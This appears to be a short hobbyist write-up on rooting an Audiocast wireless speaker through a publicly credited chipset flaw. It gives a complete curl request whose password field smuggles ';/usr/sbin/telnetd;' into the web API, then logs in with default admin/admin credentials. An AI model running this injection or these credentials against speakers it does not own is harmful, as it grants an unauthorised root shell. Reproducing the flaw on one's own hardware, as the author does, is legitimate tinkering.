Telnet hack

Folks from Exploiteers teams have found a flaw in the chipset powering the Audiocast (as well as a high number of other wireless speakers).

Start telnet

This hack is described here and consists of calling the web API with a malicious command injecting a call to telnetd.

curl '' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed


Once telnet is started, wait a couple seconds and login with admin/admin credentials.

Let's try

I have reproduced this on my Audiocast flashed with latest firmware to date.